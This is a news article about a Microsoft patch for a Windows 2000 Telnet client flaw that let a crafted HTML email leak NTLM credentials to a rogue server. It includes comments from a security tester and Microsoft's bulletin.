Windows 2000 passwords at risk

Microsoft has released a patch for Windows 2000, correcting a security vulnerability that could allow a cracker to obtain protected log-on credentials from unsuspecting victims.

Security experts warned that the problem, concerning Windows 2000's handling of the Telnet remote terminal session protocol, could lead to compromised passwords or stolen credentials.

A malicious user could exploit the vulnerability to create a carefully crafted HTML document that, when opened, could attempt to initiate a session to a rogue Telnet server. This would then automatically pass authentication credentials to the malicious server's owner.

Once authentication credentials are obtained, a plain-text password could then be derived by a brute force attack or, more subtly, the credentials might be replayed to illegitimately access networked resources.

Deri Jones, of security testers NTA Monitor, described the vulnerability as "quiet nasty" and not difficult to exploit.

"By putting a HTML message in an email, an attacker could force a connection to a Telnet server and then grab credentials," said Jones, adding that the problem is more serious than Microsoft has admitted.

A user would have to remotely log on to a target system to exploit a cracked password, said Jones, but Microsoft's assurances that a corporate firewall would block this assumes that a user's infrastructure is secure.

Microsoft admitted mistakes in its software development are behind the problem. "This vulnerability occurs because the default authentication setting of the Windows 2000 Telnet client is inappropriate," the company said in a security bulletin. "By default, the Windows 2000 Telnet client will participate in NTLM [NT LanMan] challenge-response authentication with the server."

NTLM is an authentication process that is used by all members of the Windows NT family of products. Like its predecessor LanMan, NTLM uses a challenge response process to prove the client's identity without requiring that either a password or a encrypted password be sent across the network. The Telnet client in NT4 does not use the same authentication mechanism and is therefore not susceptible to this vulnerability.

Microsoft recommends that all Windows 2000 users consider installing the patch, which may be applied to both Windows 2000 hosts with or without Service Pack 1. The patch eliminates the vulnerability by presenting a warning message to the user before automatically sending NTLM credentials to a remote server.

Click here for more information